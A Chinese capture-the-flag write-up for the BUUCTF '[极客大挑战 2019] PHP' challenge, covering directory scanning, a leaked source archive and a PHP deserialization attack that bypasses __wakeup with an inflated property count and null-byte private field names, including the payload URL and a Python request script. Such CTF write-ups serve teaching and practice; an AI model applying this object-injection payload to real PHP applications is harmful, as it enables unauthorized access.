当前位置:   article > 正文

【BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup_[极客大挑战 2019]php

[极客大挑战 2019]php

0x00 考点

目录扫描

源码泄露

反序列化

0x01 解题

dirsearch

-u 指定url

-e 指定网站语言

-w 可以加上自己的字典(加上路径)

-r 递归跑(查到一个目录后,在目录后重复跑,很慢,不建议用)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn/ -e php
  • 1

在这里插入图片描述

御剑也行

在这里插入图片描述
不要扫太快
在这里插入图片描述

/www.zip
  • 1

在这里插入图片描述
index.php
在这里插入图片描述

GET方式传入一个select参数,再反序列化

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
  • 1
  • 2
  • 3
  • 4
  • 5

包含了flag.php,所以要先出入一个序列化的参数

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41

声明一个Name类,有username,password,且都用private修饰

执行__destruct(),满足条件获得flag:password=100,username=admin

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"
  • 1

也就是

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
  • 1

在反序列化的时候会首先执行__wakeup()魔术方法,但是这个方法会把我们的username重新赋值,所以我们要考虑的就是怎么跳过__wakeup(),而去执行__destruct

跳过__wakeup()
在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
  • 1

又因为这个声明变量是private

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度

我们再次改造一下序列化

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
  • 1

使用GET请求,把准备好的序列化作为select的参数传入

/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
  • 1

在这里插入图片描述

flag{00257f4c-c053-49e6-b725-b753c91786d8}

__wakeup()方法

作用:

与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。

绕过:

反序列化字符串,当属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。

本题中,wakeup方法会导致username成为guest,因此需要通过改序列化字符串中对象的个数来绕过该方法。

name后面的2,代表类中有2个属性,但如果我们把2改成3,就会绕过__wakeup()函数。

import  requests
url ="http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn/"
html = requests.get(url+'?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}')
print(html.text)
  • 1
  • 2
  • 3
  • 4

在这里插入图片描述

private public protected区别对比

下面两个均可输出序列化结果

var_dump(serialize($a));
  • 1
$b=serialize($a);
echo $b;
  • 1
  • 2
?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;s:3:%22100%22;}
  • 1

需要把Name后面的2改成其他数字,空格的%20改成%00

只有public修饰的,原生构造就好;
private 修饰需要用 %00Name%00;
protected修饰需要用 %00*%00username

%xx,后面是16进制数值,可以查对应的ASCII码表,找到对应输出的字符

%00 
不可见的空字符(Null) ASCII码十进制为0

%20
空格
  • 1
  • 2
  • 3
  • 4
  • 5

这里加上%00,是因为username和password这两个变量都是私有变量,在形成序列化的时候,会在变量中的类名前后自动进行%00,但是在复制的时候会丢失。

这里把2改为大于2的数,是为了绕过__wakeup()函数,防止将username覆盖掉;

加上%00是因为都是私有变量,变量中的类名前后会有空白符,而复制的时候会丢失。得到payload后提交即可得到flag

private

把public里的Name去掉了,数字变小

private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中 \0 字符也是计算长度的。

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"
  • 1

public

<?php

class Name{
    public $username = 'nonono';
    public $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
string(63) "O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}"
  • 1

protected

Name 替换成了

 * 
  • 1

protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。

<?php

class Name{
    protected $username = 'nonono';
    protected $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
string(71) "O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}"
  • 1
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/464293
推荐阅读
相关标签
  

闽ICP备14008679号